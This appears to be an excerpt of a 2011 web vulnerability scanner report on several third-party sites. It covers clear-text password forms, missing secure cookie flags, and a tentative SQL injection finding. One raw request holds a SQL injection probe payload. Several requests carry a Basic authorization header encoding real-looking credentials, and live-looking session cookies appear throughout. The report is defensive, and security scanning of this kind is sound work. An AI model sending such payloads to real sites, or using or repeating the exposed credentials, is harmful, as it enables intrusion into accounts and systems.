6.280. http://www.x64bitdownload.com/new-software.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/new-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /new-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.281. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /saved-software.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.282. http://www.x64bitdownload.com/saved-software.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/saved-software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

Response

6.283. http://www.x64bitdownload.com/software-advanced.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /software-advanced.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.284. http://www.x64bitdownload.com/submit-pad-file.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /submit-pad-file.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.285. http://www.x64bitdownload.com/tellafriend.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /tellafriend.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.286. http://www.x64bitdownload.com/top-software-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /top-software-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

7. SQL statement in request parameter previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://www.soundingsonline.com
Path:	/index.php

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=2si0fjj7r75bjp5ncust0p83f6

Response

8. SSL cookie without secure flag set previous next
There are 31 instances of this issue:

https://acc.newsguy.com/a/memsubmit.asp
https://billing.cloudaccess.net/cart.php
https://www.bmwusa.com/Secured/FrameCheck.aspx
https://www.isc.org/software/inn
https://acc.newsguy.com/user/-/accnt_billing
https://acc.newsguy.com/user/-/accnt_contact
https://acc.newsguy.com/user/-/accnt_flash
https://acc.newsguy.com/user/-/accnt_history
https://acc.newsguy.com/user/-/customer_referrals
https://acc.newsguy.com/user/-/referrals_cashout
https://acc.newsguy.com/user/accnt_overview
https://acc.newsguy.com/user/accnt_renew
https://acc.newsguy.com/user/accnt_settings
https://acc.newsguy.com/user/accnt_signup_usenet
https://acc.newsguy.com/user/accnt_upgrade
https://github.com/DataSift/TweetMeme-Chrome-Extension
https://maps-api-ssl.google.com/maps
https://sell.autotrader.com/syc/syc_center.jsf/x22
https://www.bmwusa.com/ScriptResource.axd
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
https://www.bmwusa.com/Secured/NaN
https://www.bmwusa.com/WebResource.axd
https://www.bmwusa.com/jsenvconst.ashx
https://www.cloudaccess.net/copyright-policy.html
https://www.cloudaccess.net/network-report.html
https://www.cloudaccess.net/network-sla.html
https://www.cloudaccess.net/privacy-policy.html
https://www.cloudaccess.net/support-sla.html
https://www.cloudaccess.net/terms-of-service.html
https://www.paypal.com/cgi-bin/webscr
https://www.tuenti.com/

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

8.1. https://acc.newsguy.com/a/memsubmit.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://acc.newsguy.com
Path:	/a/memsubmit.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/memsubmit.asp HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:46 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
Set-Cookie: DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;
Content-Length: 5174
Expires: Mon, 24 Jan 2011 15:01:46 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>NewsGuy - Membership Drive</title>
<meta NAME="description" CONTENT="Automatically read, post, decode and track newsgroup messages
...[SNIP]...

8.2. https://billing.cloudaccess.net/cart.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://billing.cloudaccess.net
Path:	/cart.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart.php?a=add&pid=41 HTTP/1.1
Host: billing.cloudaccess.net
Connection: keep-alive
Referer: http://www.cloudaccess.net/pricing.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...

8.3. https://www.bmwusa.com/Secured/FrameCheck.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.bmwusa.com
Path:	/Secured/FrameCheck.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=hwiose4551oubw55xmxold55; path=/; HttpOnly
NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:32:50 GMT;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Secured/FrameCheck.aspx?enc=mNb/G1por6O4zQx3pFlIRkCmPwLZUcLGZgDQHB8EPuhdoa0MPkaYA89q2t3SYnOPa5KKaEJetjbTyfZfMtY2xdvcsAnZc8dTtALIF8A6taA21A83dHV0yvREQ9ZYi5DIqu7lJZdzAn3pLdhHpLkWqw== HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:12:50 GMT
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=hwiose4551oubw55xmxold55; path=/; HttpOnly
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:32:50 GMT;path=/
Content-Length: 893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title><
...[SNIP]...

8.4. https://www.isc.org/software/inn previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.isc.org
Path:	/software/inn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software/inn HTTP/1.1
Host: www.isc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 00:03:30 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8k DAV/2 PHP/5.2.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.12
Set-Cookie: SESS9cfe3c2aaf50d7f05c32ca05c0087e5f=6n6is5r71p8hmcq9aea7k12pe1; path=/; domain=.isc.org
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:03:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...

8.5. https://acc.newsguy.com/user/-/accnt_billing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_billing

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_billing HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/customer_referrals
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22337

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Billing Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

8.6. https://acc.newsguy.com/user/-/accnt_contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_contact

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_contact HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_billing
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=OUv_K55TQrSiTPkaFmDuUem4opp0oWW0L4d3d9235

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 8709

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Contact Details</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmar
...[SNIP]...

8.7. https://acc.newsguy.com/user/-/accnt_flash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_flash

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_flash HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:13 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 11585

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Flash Report</TITLE>
<script src="/accnt_forms.js"></script>
<script src="/accnt_ref.js"></script>
<script src="/lotto.js"></script>
</HEAD>

<bo
...[SNIP]...

8.8. https://acc.newsguy.com/user/-/accnt_history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/accnt_history

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/accnt_history HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_contact
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=STcAtGU6KvbrR3ZK53Am_em4opp0oWW0L4d3d9237

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:44 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=V7YlZkC_LNm7StDUl.fCuemaopp0oWW0L4d3d923c; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5814

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Purchase History</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

8.9. https://acc.newsguy.com/user/-/customer_referrals previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/customer_referrals

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/customer_referrals HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:29 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17318

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Referral Credits</TITLE>
<script src="/referrals.js"></script>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#265
...[SNIP]...

8.10. https://acc.newsguy.com/user/-/referrals_cashout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/-/referrals_cashout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/-/referrals_cashout HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=obHFXmnhMbJX5LfJRNZRWemqopp0oWW0L4d3d924f

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:10 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3297

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Account Administration - CashOut! Referral Credits</title>
<meta NAME="description" CONTENT="Automatically read, post, de
...[SNIP]...

8.11. https://acc.newsguy.com/user/accnt_overview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_overview

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/accnt_overview HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:35 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Overview</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

8.12. https://acc.newsguy.com/user/accnt_renew previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_renew

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

